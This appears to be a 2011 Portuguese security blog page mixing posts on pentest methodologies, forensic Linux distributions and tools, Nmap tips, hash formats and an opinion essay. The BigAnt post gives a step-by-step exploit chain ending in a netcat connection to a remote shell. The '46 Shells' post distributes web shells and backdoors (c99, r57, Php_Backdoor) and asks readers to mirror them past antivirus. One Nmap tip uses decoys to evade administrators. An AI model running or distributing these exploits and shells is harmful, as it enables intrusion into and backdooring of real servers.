banner468

domingo, 29 de maio de 2011

Palestra - Analfabetismo digital e responsabilidade objetiva

Palestra dada pelo Dr: Regilberto Girão

Especialidade : Tecnólogo em Segurança Empresarial, Especialista em Segurança Corporativa, Pós-graduando (MBA) em Gestão de Tecnologias da Informação, Pós-graduando em Direito e Tecnologia da Informação e dedicado ao estudo da Segurança da Informação e Comunicações e membro da Comissão de Crimes de Alta Tecnologia da OABSP.

Twitter: http://twitter.com/cibercrime

Parte 01

Parte 02


Parte 03


Parte 04



Parte 05



Parte 06


Parte 07

Palestra na OABSP em 19/05/2011.

terça-feira, 24 de maio de 2011

1 ano do Blog do Bhior






Tinha esquecido, dia 12 de maio o blog fez um ano! hahaha esse esquecimento e de minha natureza. Percebi depois de ver em um blog de um amigo.
Estou no meio da informática desde 2008, nesse período fiz grande amigos, não vou listar porque como vocês perceberam "sou meio esquecido" e vou acabar esquecendo alguns...

Se tiverem alguma dica para melhoria do blog ou em outro aspecto, reporte abaixo para que possamos dialogar sobre o assunto, ou também se tive querendo me manda dinheiro e etc... hahaha

Abraços []'

segunda-feira, 23 de maio de 2011

Metodologias de testes de penetração

O teste de penetração é um método que avalia a segurança de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em potencial que possa ser resultado de uma má configuração do sistema, falhas em hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas contramedidas. Todas as análises submetidas pelos testes escolhidos são apresentadas no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta de resolução ou de uma solução técnica. Esses testes são feito para avaliar os computadores, sistemas ou redes de vulnerabilidades e explorá-los, a fim de medir o impacto das falhas para o sistema em teste. Os diferentes Frameworks de testes e metodologias, existem para ajudar o "pentester" escolher a melhor estratégia para realizar um teste de penetração bem sucedida. Aqui está uma lista das metodologias mais utilizadas.
http://en.wikipedia.org/wiki/Penetration_test

OSSTMM – Open Source Security Testing Methodology Manual


O Open Source Security Testing Metodologia Manual (OSSTMM) é um peer-reviewed metodologia para a realização de testes de segurança e métricas. Os casos de teste OSSTMM estão divididas em cinco canais (pontos) que o teste coletivamente: informações e dados controles, os níveis de sensibilização para a segurança pessoal, a fraude e os níveis de controle social, engenharia de redes informáticas e de telecomunicações, dispositivos sem fio, dispositivos móveis, controles de acesso físico, segurança, segurança processos e locais físicos, como edifícios, perímetros, e bases militares.
http://www.isecom.org/osstmm/

OWASP


O Open Web Application Security Project (OWASP) é um projeto open-source de segurança do aplicativo. A comunidade OWASP inclui corporações, organizações educacionais e indivíduos de todo o mundo. Essa comunidade trabalha para criar artigos livremente disponíveis, metodologias, documentação, ferramentas e tecnologias
https://www.owasp.org/index.php/Main_Page

ISSAF


O projeto OISSG ISSAF é emblemática. É um esforço para desenvolver uma estrutura de ponta a ponta para a avaliação de segurança. O ISSAF visa oferecer um único ponto de referência para os profissionais envolvidos na avaliação de segurança, ele reflete e aborda as questões práticas de avaliação da segurança.
http://www.oissg.org/wiki/index.php?title=ISAAF-PENETRATION_TESTING_FRAMEWORK

Mais algumas referências:
http://www.oissg.org/wiki/index.php?title=PENETRATION_TESTING_METHODOLOGY
http://www.oissg.org/issaf
http://ccwapss.blogspot.com/
http://www.penetration-testing.com/
https://www.ee.oulu.fi/research/ouspg/Glossary
http://bluetooth-pentest.narod.ru/
http://www.infosecinstitute.com/blog/2005/10/penetration-testing-methodology-fact.html

domingo, 22 de maio de 2011

Lista de distribuições Linux para Forense Digital


A Computação Forense consiste, basicamente, no uso de métodos científicos para preservação, coleta, validação, identificação, análise, interpretação, documentação e apresentação de evidência digital com validade probatória em juízo. A aplicação desses métodos nem sempre se dá de maneira simples, uma vez que encontrar uma evidência digital em um computador pode ser uma tarefa muito árdua. Atualmente, com os discos rígidos atingindo a capacidade de TeraBytes de armazenamento, milhões de arquivos podem ser armazenados. Logo, é necessário a utilização de métodos e técnicas de Computação Forense para encontrar a prova desejada que irá solucionar um crime, por exemplo.

http://pt.wikipedia.org/wiki/Computa%C3%A7%C3%A3o_forense
http://pt.wikipedia.org/wiki/Forense_computacional


SANS SIFT Workstation 2,0

Faculty Fellow Rob Lee criou o SANS Investigativo Forensic Toolkit Workstation (SIFT) apresentou na Computação Forense Investigações e Resposta a Incidentes de curso (FOR 508) a fim de mostrar que as investigações avançadas e hackers investigando pode ser feito usando ferramentas disponíveis livremente open-source. O SANS SIFT Workstation é um aparelho de VMware, que é pré-configurado com todas as ferramentas necessárias para realizar um exame detalhado forense digital. É compatível com Expert Witness Format (E01), Advanced Forensic Format (AFF), e matérias-primas formatos (dd) provas. A nova versão foi totalmente reconstruída sobre uma base Ubuntu com muitas ferramentas e recursos que podem corresponder a qualquer pacote de ferramentas forenses modernas.

http://computer-forensics.sans.org/community/downloads


C.A.IN.E. Computer Aided Investigative Environment

Caine (Computer Aided Investigativo Environment) é um italiano GNU / Linux live criado como um projeto da Digital Forensics
Atualmente, o gerente do projeto é Nanni Bassetti. CAINE oferece um completo ambiente forense, que é organizado para integrar ferramentas de software existentes como módulos de software e para fornecer uma interface gráfica amigável.

Os objetivos principais do projeto que visa garantir CAINE são os seguintes:

* um ambiente inter-operável que suporta o investigador digital durante as quatro fases da investigação digital
* uma interface gráfica amigável
* compilação de uma semi-automática do relatório final

http://www.caine-live.net/

DEFT Linux

DEFT 6 baseia-se Lubuntu com Kernel 2.6.35 (Linux lateral) e Extra DEFT 3.0 (Windows lado) com os melhores freeware Computação Forense, que é um novo conceito de computador do sistema judicial ao vivo, ewflib pronto, que usam o WINE para executar Windows Computer Forensics ferramentas em Linux.

http://www.deftlinux.net/


SMART Linux

SMART é uma distribuição Linux live CD do Linux, personalizado e concebido para dados forense, a Discovery Eletrônica e Resposta a Incidentes. Cada aspecto da SMART Linux foi otimizado e configurado para a produção de um ambiente limpo, não-invasivo, de ambiente do sistema operacional forense.

http://www.asrdata2.com/

Forensic Hard Copy.

FHC é uma distribuição Linux desenvolvida apenas para a aquisição de evidências digitais em dispositivos de armazenamento. É comumente usado da Polícia Italiana Cyber ​​a fim de acelerar e manter a integridade dos dados.

http://www.fhclive.org/

REMnux Linux Distribution for Reverse-Engineering Malware

REMnux é uma distribuição Linux leve para auxiliar analistas de malware em engenharia reversa de software malicioso. A distribuição é baseada no Ubuntu e é mantido por Lenny Zeltser.

REMnux é projetado para executar os serviços que são úteis para emular dentro de um ambiente de laboratório isolado na realização de análise de malware comportamentais. Como parte deste processo, o analista normalmente infecta um outro sistema de laboratório com a amostra de malware e direciona as ligações potencialmente maliciosos para o sistema REMnux que está escutando nas portas apropriadas.

http://remote-execution.blogspot.com/2010/08/remnux-distribuicao-linux-para-reverse.html

FDTK-UbuntuBr – Forense Digital ToolKit

O FDTK-UbuntuBr, é um projeto livre que objetiva produzir e manter uma distribuição para coleta e análise de dados em Pericias de Forense Computacional.

O projeto FDTK-UbuntuBr é uma distribuição Linux criada a partir da já consagrada distribuição Ubuntu, e reúne mais de 100 ferramentas capazes de atender a todas as etapas de um investigação em Forense Computacional, oferecendo a possibilidade de ser utilizada como LiveCD e também ser instalada em um equipamento transformando-o em uma estação Forense. Essa distribuição está em constante desenvolvimento e caracteriza-se não apenas pela quantidade de ferramentas, mas também por uma interface amigável, estruturada conforme as etapas do processo de perícia e, ainda pela preocupação por ser distribuída no idioma português.

Atualmente ela está na versão 3.0, e contamos com sua contribuição de toda a comunidade Linux para que ela fique ainda melhor.

http://fdtk.com.br/www/download/

FCCU -  Federal Computer Crime Unit

FCCU GNU/Linux Forensic Bootable CD é um CD bootável baseado no Knoppix, que contém uma grande quantidade de ferramentas adequadas para investigação forense computacional, incluindo bash scripts.

FCCU GNU / Linux Forensic objetivo principal Boot CD é a criação de imagens de dispositivos antes da análise, e é usada pelo Belgica Federal Computer Crime Unit.

http://www.lnx4n6.be/index.php?sec=Downloads&page=bootcd

Helix - Digital Forense

Helix3 Pro é a única ferramenta necessária para cada kit de ferramentas de informática forense! Obter a única ferramenta com um LiveCD de arranque para as suas necessidades de investigação.

A multi-plataforma Live Side para três ambientes; Mac OS X, Windows e Linux com uma interface simples de usar
         Faça imagens forenses de todos os dispositivos internos
         Faça uma imagem forense de memória física (32 e 64 bits)
         Determinar se o nível de criptografia de disco está ativada
Um ambiente de boot forense para inicializar qualquer sistema x86
         Faça imagens forenses de todos os dispositivos
         Procura arquivos para tipos de arquivo específico (ou seja, arquivos gráficos, arquivos de documentos, etc)
Vários aplicativos de código aberto forense para auxiliar na análise dos dados, incluindo a análise de telefone celular.

http://www.e-fense.com/helix3pro.php

Atualizado em 28/05/11.

-----------------------------xxx-----------------------------

Extra:

Lista de ferramentas separadas por etapas

1 – Coleta de Dados

Formulário --> Formulário de Cadeia de Custódia

gnome-screenshot -> Salvar imagens da àrea de trabalho ou de janelas individuais

aimage --> Geração de imagem dos dados das mídias utilizando o padrão aff

air --> Interface gráfica para dd/dcfldd, para criar facilmente imagens forense

---------------xx------------------

dc3ddgui --> Interface gráfica para O DC3DD, para criar imagens forense

dcfldd --> Versão aprimorada pelo DOD-Departament of Defense do dd

dd --> Ferramenta para geração de imagem dos dados

ddrescue --> Recuperar dados de hds com setores defeituosos (bad blocks)

mondoarquive --> Copiar dados de fitas, cd's, nsf ou hd's

mondorestore --> Restaurar dados de fitas, cd's, nsf ou hd's

rdd --> Versão mais robusta do dd

rddi --> Prompt interativo do rdd

sdd --> Versão da ferramenta dd para Fitas (DAT, DLT...)

memdump --> Dumper de memória para sistemas UNIX-like

md5sum --> Gerar hash md5

sha1sum --> Gera hash sha 160bits

discover --> Informações sobre Hardware

hardinfo --> Informações e Testes do Sistema

lshw-gráfico --> Lista os dispositivos de hardware em formato HTML

sysinfo --> Mostra informações do computador e do sistema

wipe --> Remover totalmente os dados das Mídias

2 – Exame dos Dados

cabextract --> Acessar conteúdo de arquivos .cab

orange --> Ferramenta para manipular arquivos .cab

p7zip --> Acessar arquivos zip

unace --> Ferramenta para descompactar extensões .ace

unrar-free --> Ferramenta para descompactar arquivos rar

unshield --> Ferramenta para descompactar arquivos CAB da MS

xarchiver --> Criar, modificar e visualizar arquivos compactados

zoo --> Acessar arquivos compactados .zoo

dcraw --> Acessar imagens cruas de câmeras digitais

exif --> Ler informações EXIF de arquivos jpeg

exifprobe --> Exame do conteúdo e da estrutura dos arquivos de imagens JPEG e TIFF

exiftran --> Transformar imagens raw de câmeras digitais

exiftags -->  Adquirir informações sobre a câmera e as imagens por ela produzidas

exiv2 --> Manipular metadados de imagens

jhead --> Visualizar e manipular os dados de cabeçalhos de imagens jpeg

jpeginfo --> Ferramenta para coletar informações sobre imagens jpeg

antiword --> Ferramenta para ler arquivos do MS-Word

dumpster --> Acessar os arquivos da lixeira do Windows

fccu-docprob --> Ferramenta para visualizar as propriedades de arquivos OLE

mdb-hexdump --> Ferramenta para manipulação de arquivos MDB

readpst --> Ferramenta para ler arquivos do MS-Outlook

reglookup --> Utilitário para leitura e resgate de dados do registro do Windows

regp --> Acessar o conteúdo de arquivos .dat

tnef --> Acessar anexos de email's MS

bcrypt --> Encriptar e decriptar arquivos usando o algoritmo blowfish

ccrypt --> Encriptar e decriptar arquivos e streams

outguess --> Detectar dados ocultos em imagens JPG

stegcompare --> Comparar imagens jpeg e detectar a existência de steganografia

stegdimage --> Detectar a existência de steganografia em imagens jpeg

stegdetect --> Detectar a existência de steganografia em imagens jpeg

xsteg --> Ferramenta gr fica para detectar steganografia em imagens jpeg

ghex2 --> Visualizar arquivos em formato HEX

hexcat --> Visualizar arquivos em formato HEX

ghexdump --> Visualizar arquivos em formato HEX

affcat --> Verificar conteúdo de arquivos .aff sem montar

afcompare --> Comparar dois arquivos .aff

afconvert --> Converte aff -> raw, raw -> aff, aff -> aff recompactando-o

afinfo --> Visualizar estatísticas sobre um ou mais arquivos aff

afstats --> Visualizar estatísticas sobre um ou mais arquivos aff

afxml --> Exportar metadados de arquivos aff para um arquivo xml

dcat --> Localizar dados dentro de arquivos dd, aff, ewf

glark --> Ferramenta semelhante ao grep para localizar dados

gnome-search-tool --> Ferramenta gráfica de localização de arquivos

slocate --> Localiza arquivos e indexa os disco

mac-robber --> Coletar dados de arquivos para criar a linha de tempo (timeline)

mactime --> Cria uma linha do tempo ASCII das atividades dos arquivos

ntfscat --> Concatenar arquivos e visualizá-los sem montar a partição NTFS

ntfsclone --> Clonar um sistema de arquivos NTFS ou somente parte dele

ntfscluster --> Localizar arquivo dentro de cluster ou de v rios clusters NTFS

ntfsinfo --> Obter informações sobre partições NTFS

ntfslabel --> Verificar ou alterar a descrição de partições NTFS

ntfsls --> Lista o conteúdo de diretórios em partições NTFS sem montá-los

fcrackzip --> Ferramenta para quebrar as senhas de arquivos compactados em ZIP

john the ripper --> Ferramenta para localizar senhas de usuários

medussa --> Crack de senhas

ophcrack --> Crack de senhas do Windows

e2undel --> Ferramenta para recuperar arquivos em partições ext2

fatback --> Ferramenta para recuperar dados de sistemas de arquivos FAT

foremost --> Ferramenta para recuperação de imagens a partir dos cabeçalhos

gzrecover --> Ferramenta para extrair dados de arquivos gzip corrompidos

magicrescue --> Recuperação de imagens RAW, baseando-se nos cabeçalhos

ntfsundelete --> Recuperar arquivos deletados em partições NTFS

recover --> Ferramenta para recuperar todos inodes deletados de um disco

recoverjpg --> Ferramenta para recuperar imagens jpg

scrounge-ntfs --> Ferramenta para recuperar dados de partições NTFS

chkrookit --> Ferramenta para identificar a presença de rootkits no sistema

rkhunter --> Ferramenta para identificar a presença de rootkits no sistema

fspot --> Organizador de imagens fotos

gthumb --> Visualizar e organizar imagens

imageindex --> Gera galeria de imagens em html

3- Análise das Evidências

coockie_cruncher --> Analisar coockies

eindeutig --> Analisar arquivos .dbx

fccu-evtreader --> Script perl para visualizar arquivos de eventos da MS (EVT)

galleta --> Analisar coockies do Windows

GrocEVT --> Coleção de scripts construídos para ler arquivos de eventos do Windows

mork --> Script perl para visualizar arquivos history.dat do firefox

pasco --> Analisar cache do IExplorer

rifiuti --> Analisar arquivos INF2 da MS

xtraceroute --> Tracerouter gráfico

4 – ToolKits

autopsy --> Browser para realizar Perícias Forenses

Cursos online gratuito com Certificação Intel

Conhece o Next Generation Center? Lançado em 2002, relançado em 2003 e reformulado em 2009, é uma iniciativa da Intel com o conteúdo desenvolvido pela IDG Brasil. A proposta é formar profissionais em temas relacionados à tecnologia e negócios, através de cursos online.
intlogo Cursos online gratuitos da Intel com certificadonote 638935094 Cursos online gratuitos da Intel com certificado
Os cursos são modulares, têm uma avaliação a cada módulo e no final o aluno recebe um certificado de conclusão.
Além dos cursos, o site conta com vídeos sobre tecnologias Intel, documentos, estudos de caso e calendário de eventos.
Veja a lista de cursos atualmente disponíveis no site:

  • Aplicativos
    • CRM
    • Business Intelligence
    • ERP
    • Supply Chain management
    • Verticalização
    • Software Livre
  • Armazenamento
    • Storage
    • Virtualização
  • Convergência
    • Convergência
    • VoIP
    • Conectividade Sem Fio
    • Comunicações Unificadas
    • Redes de Próxima Geração
    • Mobilidade
  • Gerenciamento
    • Gerenciamento Integrado
    • Gerenciamento de TI
    • Economia de Energia
    • TI Socialmente Responsável
    • Tecnologia Blade
  • Gestão Empresarial
    • ROI e Business Value
    • Governança Corporativa
    • BPM
    • Trabalho Remoto
    • Modelagem de Negócios
  • Integração
    • Web Services
    • Integração
    • Redes Sociais
  • Negócios Online
    • Empresa Digital
    • E-Business
    • Web 2.0
  • Segurança
    • Segurança da Informação
    • Certificação Digital
  • Serviços
    • Terceirização
    • Software as a Service
    • Utility Computing
    • SOA
    • Grid Computing
    • Missão Crítica
    • Cloud Computing
  • TI Aplicada
    • TI na Educação
    • TI Aplicada às PMEs
    • Infraestrutura de TI para PMEs
Então, que tal mostrar um currículo cheio de treinamentos bacanas assinados pela Intel para o seu chefe? Isso pode render uma vaga naquele novo projeto de TI da sua empresa, que tal?
CLIQUE AQUI E ACESSE

Exploration of Windows 7 Advanced Forensic Topics


Baixem os anexo:


































sábado, 21 de maio de 2011

Explorando falha no BigAnt


O BigAnt é um software voltado para o uso em empresas, pois ele basicamente é um mensageiro instantâneo no qual o administrador da rede cria um servidor, cria todas as contas que poderão acessá-lo, definindo suas permissões de acesso e senhas, e integra a comunicação dos seus funcionários, não importando o tamanho da sua empresa. Além disso, todas as mensagens trocadas são criptografadas, ou seja, não haverá perigo de alguém roubar informações confidenciais através de uma conversa entre gerentes, por exemplo.

Ao baixar o BigAnt existirão dois arquivos, um é o mensageiro em si e o outro é o console, ou seja, o servidor pelo qual o administrador controlará o andamento das coisas. Instale ambos. A primeira coisa a ser feita é rodar o console e criar um servidor, grupos e usuários. Ao executar o console clique em “demo” para assistir a um vídeo demonstrando o funcionamento básico dele.

Usuários

Depois repasse o IP e nome de usuário e senha para aqueles que venham a utilizar o seu servidor. Por fim, basta inserir esses dados no “messenger” e usá-lo como se fosse o Windows Live Messenger, pois ambos funcionam de maneira muito similar.

Agora que sabemos... vamos a arte da exploração. :)

Ferramentas usadas: 

Comandos:
nmap -p 1-9999 192.168.1.102
cd /pentest/exploits/exploit-db
./searchsploit bigant
cp platforms/windows/remote/10765.py /root/
cd /root/
python 10765.py 192.168.1.102
nc 192.168.1.102 4444

Sobre a aula:
Tamanho: 34 Mb
Formato: AVI
Duração: 3:14
Musica: The Marcels - Blue Moon


quinta-feira, 19 de maio de 2011

10 truques e técnicas do Nmap


O Nmap (“Network Mapper”) é uma ferramenta de código aberto para exploração de rede e auditoria de segurança. Ela foi desenhada para escanear rapidamente redes amplas, embora também funcione muito bem contra hosts individuais. O Nmap utiliza pacotes IP em estado bruto (raw) de maneira inovadora para determinar quais hosts estão disponíveis na rede, quais serviços (nome da aplicação e versão) os hosts oferecem, quais sistemas operacionais (e versões de SO) eles estão executando, que tipos de filtro de pacotes/firewalls estão em uso, e dezenas de outras características. Embora o Nmap seja normalmente utilizado para auditorias de segurança, muitos administradores de sistemas e rede consideram-no útil para tarefas rotineiras tais como inventário de rede, gerenciamento de serviços de atualização agendados, e monitoramento de host ou disponibilidade de serviço.

Manual do Nmap em Português: http://nmap.org/man/pt_BR/index.html#man-description
Planilha de comandos: http://remote-execution.blogspot.com/search/label/Nmap

1) Obter a lista de servidores com uma porta aberta específica

nmap -sT -p 80 -oG – 192.168.1.* | grep open

Alterar o argumento -p para o número da porta. Consulte "man nmap" para ver maneiras diferentes para especificar faixas de endereços

2) Fazer ping em um intervalo de endereços IP

nmap -sP 192.168.1.100-254

nmap aceita uma grande variedade de addressing, multiplos targets/ranges, etc...

3) Obter informações sobre as portas de host remoto e detecção de SO

nmap -sS -P0 -sV -O

Onde pode ser um único IP, um nome ou uma sub-rede

-sS TCP SYN scanning (também conhecido como half-open(semi-aberto) ou stealth scanning)

-P0 permite que você desligue pings ICMP.

-sV permite a detecção da versão

-O flag que permite a tentativa de identificar o sistema operacional remoto

Outras opções:

-A oopção permite que ambos OS fingerprinting e detecção de versão

-v use -vv duas vezes para obter mais detalhamento.


nmap -sS -P0 -A -v < ALVO >

4) Verificar Rede de Rogue APs.

nmap -A -p1-85,113,443,8080-8100 -T4 –min-hostgroup 50 –max-rtt-timeout 2000 –initial-rtt-timeout 300 –max-retries 3 –host-timeout 20m –max-scan-delay 1000 -oA wapscan 10.0.0.0/8

Eu usei esta verificação encontrar com êxito muitos APs em uma rede muito, muito grande.

5) Use um chamariz durante a digitalização de portas para evitar ser pego pelo administrador de sistemas

sudo nmap -sS 192.168.0.10 -D 192.168.0.2

Verificar se há portas abertas no dispositivo de destino do computador (192.168.0.10), enquanto a criação de um endereço de IP (192.168.0.2). Isto irá mostrar o endereço ip falso em vez do seu ip em alvos. Verifique o log de segurança de alvos em /var/log/secure para ter certeza que funcionou.

6) Verificar se há o vírus Conficker na sua LAN ect.

nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1 192.168.0.1-254

substituir 192.168.0.1-256 com o IP que você deseja verificar.

7) Lista de registros de DNS reverso para uma sub-rede

nmap -R -sL 209.85.229.99/27 | awk ‘{if($3==”not”)print”(“$2″) no PTR”;else print$3″ is “$2}’ | grep ‘(‘

Este comando utiliza o nmap para executar consultas de DNS reverso em uma sub-rede. Ela produz uma lista de endereços IP com o correspondente registro PTR para uma determinada sub-rede. Você pode entrar na sub-rede na notação CDIR (i.e. /24 para um Classe C)). Você poderia adicionar "xxxx-dns-servers" após o "-sL " se você precisar de pesquisas para ser executada em um servidor DNS específico. Em algumas instalações necessidades nmap se executado em sudo. Também espero awk é padrão na maioria das distros.

8) Encontre todos os endereços de IP em uma rede

nmap -sP 192.168.0.*

Existem várias outras opções.

Outra opção é:

nmap -sP 192.168.0.0/24

para sub-redes específicas.

9) Como muitas distribuições Linux e Windows, quais dispositivos estão em sua rede?

sudo nmap -F -O 192.168.0.1-255 | grep "Running: " > /tmp/os; echo "$(cat /tmp/os | grep Linux | wc -l) Linux device(s)"; echo "$(cat /tmp/os | grep Windows | wc -l) Window(s) devices"

10) Encontre IPs não utilizados em uma determinada sub-redes

nmap -T4 -sP 192.168.2.0/24 && egrep “00:00:00:00:00:00″ /proc/net/arp

Agora e se diverti!!!

Autor Isaiah.

terça-feira, 17 de maio de 2011

46 Shells

Fui juntando algumas shells que tenho aqui no meu micro, e resolvi compartilha-las com os senhores(a).


Nomes:
allasp
allphp
aspydrv
c100
c99
cgitelnet
cmd
CrystalShell v.1
Cyber Shell v 1.0
dC3 Security Crew Shell PRiV
Dive Shell 1.0
DxShell.1.0
egy
elmaliseker
fx
GFS web-shell ver 3.1.7
h4ntu shell
JspWebshell 1.2
KAdot Universal Shell v0.1.6
List Maker
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit
locus
Mysql interface v1.0
MySQL Web Interface Version 0.8
NIX REMOTE WEB-SHELL v.0.5
phpjackal1.3
Php_Backdoor
Private-¡3lue
r57
RemExp
Rootshell.v.1.0
RST MySQL tools
s72 Shell v1.1
Safe mode breaker
Safe0ver Shell
Server Variables
SimAttacker
SimShell 1.0
sniper
SnIpEr_SA Shell
tool
uploader
WinX Shell
Worse Linux Shell
zehir
zehir4

Pesquisando c99 no google:

Sites com varias shells on line:

Baixar as shells:

Não tenho conta no depositfiles, então se puderem criar espelhos(Mirros - Uparem em outros servidores) eu agradeço, pois assim sempre estão on line, e comente abaixo que que atualizo o tópico. Gosto do 4shared, mas ele tem scanner de virus, e acaba enviando o arquivo para quarentena.

domingo, 15 de maio de 2011

Encurtadores de URL´s



Desde que começamos a sofrer com o limite dos 140 caracteres, os serviços para encurtar URLs, ganharam visibilidade.
Particularmente eu não gosto desses serviços, não tem como saber que "desgraça" estar por traz do link, então muitos crackers estão usando esse endereços mascarados para disseminar vírus...

Vou listar alguns mais populares, mas caso fiquem com suspeitas usem o serviço do untine - http://untiny.me/ um desencurtador de URL´s.

http://bit.ly/

http://migre.me/

http://tinyurl.com/

http://notlong.com/

http://is.gd/

http://tr.im/

http://www.uiope.me/

http://www.okm.me/

http://pra.la/

http://clipe.me/

http://taih.info/

http://curt-ir.com/

http://favi.me/

http://bif.me/

http://ww7.me/

http://goo.gl/

http://v.gd/

http://miud.in/

http://pqp.vc/

http://www.sitemeu.net/

Tipos de criptografia de senhas

Tem um artigo no blog, falando sobre hash e alguns tipos de hash mais populares http://remote-execution.blogspot.com/2011/03/o-que-e-hash.html .

E indispensável hoje em dia identificar o tipo de criptografia.

Nesse tópico vou lista os tipos de criptografias usados em senhas:

Mais comuns:

md5 = aba8c5f77c63653318ac43fe1a1d54ff
md4 = 67e36c3b402837bc8d9bc1c982233ad7
md2 = d1c34d62fc8a2ffb68536d82cca44334
sha1 = 59f86a19c4b2f8d80e5b14abc351d050dea188eb
sha256 = a94a011d426052a7c81692f0d3f8032424d9178d419acb2fcdcea3160383f602
sha384 = 6dba2d81242cc76c0ea17f3da21cb7d47439a65074fbe679dc92394b4f5c6b954436e8
69248df9b60412ebee97d41fcd
sha512 = 48fcd376a0eb0227a6d7bc3a28ef826f5c2bc4a62fe0fc2139e7427ccb86851f2030e5
a855b2a501b98e70f0040d592711426b6798cb8be110bf4dc75724cd2b
LM = 7bc213962f4bcef4f9393d97e7a1873c
NT = e6dd58312b8f14b889be39d8db2007fd
base_64 = cGFuZGVtaWM=
rot_13 = cnaqrzvp

Menos comuns:

crc32 = 2fda1591
crc32b = 968c0941
snefru = 5369d04ab36c05e6ee996a7eb48ae8eabcc8bdcb6dac2313bfc8a2babcd7c781
gost = 3d7ef36be32f6e34d5ebbae623295f5aced68d3c65406543449f208ffe0ad318
adler32 = 0ec70342
ripemd128 = cb9c7298626eb8ee0cf512ff3e7d4037
ripemd160 = 89dfb8ce8200d4eb238c7548c9757dc67160c028
tiger128,3 = 3d11457e9e47411c7b233baa90d7c650
tiger128,4 = c9400fdc3b6383ab8bb84404601fbfd2
tiger160,3 = 3d11457e9e47411c7b233baa90d7c650f6f669d7
tiger160,4 = c9400fdc3b6383ab8bb84404601fbfd23a1793de
tiger192,3 = 3d11457e9e47411c7b233baa90d7c650f6f669d7f6d42787
tiger192,4 = c9400fdc3b6383ab8bb84404601fbfd23a1793de7655d0f0
haval128,3 = e901a382531811fe11eeca7c81d1f256
haval128,4 = 78e397c109c31e65dda2300568d715fd
haval128,5 = 6292bd7e504a4e487e3e3105eb92d02c
haval160,3 = 3b5cfdf65ca5e7e8501e21f19a51e697ca8ddfa4
haval160,4 = bf8ec2e0e1fd63e222d659cd9249a2eb7fb8f0d6
haval160,5 = bb56c5fed5abf72d12b3a0efd7c031c4952e9006
haval192,3 = ad73ada2cd0127771526d0d93c15894b0b9bb1affb13015e
haval192,4 = 56198e71a73dbd2b4ccc5a09b584140d2e66cffef19a79d3
haval192,5 = b1f209c245b3caed6238cfdfbf0967d5f53972129daf23d1
haval224,3 = a1e79ed89e599dc8aeb0bb76e207751c4b760eeea363ddbc8413805c
haval224,4 = dd65527ada7c35b3ff9535851be011a93eb62e51ef3eb112a7ab1887
haval224,5 = 0516bc0064806c6ff70cff3bb06c55a3b62be3c393c3a6874c04ae0c
haval256,3 = 21cbc6fcd6adef4354aa9ef3cf639e73a63aeb50cf5b5ce93f70863619f9d2b9
haval256,4 = 7ae3cbb3b02b1f890e1c375f987a13f6ae97fa8a5e392e4f60ec5d6b6fac1565
haval256,5 = f57a10b3dbdcc95d768e6b5e3a7818505826140e27047ad8bef5c10997d234dc
whirlpool = c86c64e781718ab426b7dcd36b1468a3781cee0be35aac5957a43408e8b15a65dfeee1
499ba9b18a847f9a39d68c1dfb4dd682967ff67b11595ad2dcc27fdbc1

Pandemic

Brasileiros não aceitam ser criticados e nem contrariados.

Acabei de bater papo com um amigo que acaba de voltar dos EUA. Ele voltou depois de 6 anos. O que mais lhe chamou a atenção de diferente entre a cultura americana e a brasileira é que: Brasileiro não gosta de ser criticado, muito menos contrariado. Quando isso é feito, ele fica de mal, levando até mesmo para o lado pessoal.

Desde pequenos, nós, brasileiros, fomos acostumados a não criticar ninguém. “Isso é feio”, diziam nossos país. Mas como avaliar uma pessoa ou dizer que ela está fazendo algo errado sem criticá-la. O famoso feedback é um jargão bonito que muitas pessoas para o que ? Criticar alguém ou alguma coisa.

Outro termo que é engraçado e muito empregado por aqui é a crítica positiva. A pessoa começa a frase dizendo: Farei uma crítica, mas já aviso que é positiva. O ato de criticar é da natureza humana, quando você o faz é porque você possui uma opinião, positiva ou negativa, sobre uma determinada coisa, resta à pessoa analisada aceitar ou não, e serei sincero, o problema é totalmente dela o fato de aceitar ou não a critica.

Convivo com diferentes pessoas e culturas e aprendi, nesses 30 anos, que não podemos agradar a gregos e troianos. A critica que recebemos dos felizes e infelizes, como diz a minha avó, deve ser analisada pelo seguinte ponto de vista: ela trará ou não trará algo de útil para você ?. Um ponto interessante em nossas vidas nos importamos menos com as críticas quanto mais envelhecemos, fazendo o que queremos e não estando nem aí para a opinião dos outros.

Vejam por exemplo as pessoas que chegam na crise dos 30 e dos 40 anos. Em minha opinião, estas pessoas ligam o velho e conhecido foda-se e querem fazer o que vier na cabeça, sem se preocupar com a opinião de ninguém. Quanto mais uma pessoa que chega aos seus 60 ou 80 anos.
O fato é que o ser humano deve se lembrar, constantemente, que estamos em um processo evolucionário, e a crítica é a forma de continuarmos este processo, seja ela boa ou ruim.

Contrariar uma pessoa aqui no Brasil, para muitos, é o mesmo que dizer que esta pessoa é burra. Brasileiros contrariados se sentem ofendidos. Suas opiniões são tidas como verdadeiras e imutáveis, onde o que os outros pensam não importa ou está completamente errado. Ledo engano, caros brasileiros. Nossas ideias sobre o mundo, política e civilidade estão completamente erradas.

Estamos anos-luz de distância de povos que discutem ideias entre si há séculos e possuem uma qualidade social e econômica muito diferente da nossa, e vocês sabem por que ? Se as pessoas não discordam com uma coisa, elas falam, expõem e discutem. Caso isso que estou falando fosse diferente, nós não elegeríamos tantos corruptos, bandidos e salafrários. Não teríamos tanta miséria e desigualdade.

Se eu não concordo com uma opinião ou ponto de vista, eu falo, mas de forma educada. Não sejamos ogros ou seres mal educados, até porque nós somos civilizados. Outro ponto que acho muito engraçado é a capacidade de criarmos deuses, gênios ou experts sobre um determinado assunto, onde tudo o que ele dizer está correto, é escrito com sangue e nunca poderá ter a sua opinião contrariada, já que ele, o semi-deus, sabe mais que nós, pobres mortais.

Pessoas fingem ser ignorantes para não passar aquela ideia de serem chatas ou cricri, frases como:  “Ele vai ficar sismado ou chateado comigo se eu discordar “ são ditas por aqueles que têm medo de se expressar. Vejo por exemplo alguns professores universitários. Eles apresentam de cara os seus títulos e trabalhos antes de falarem o seu próprio nome, dizendo que estão ali para ensinar, já que os alunos presentes não estão preparados, ainda, para discutir ou expressarem a sua própria opinião por não serem dignos deste ato, tido por muitos, quase místico.

O ato de entender ou aprender algo começa no momento que você discute o por que deste algo ser ou existir assim.
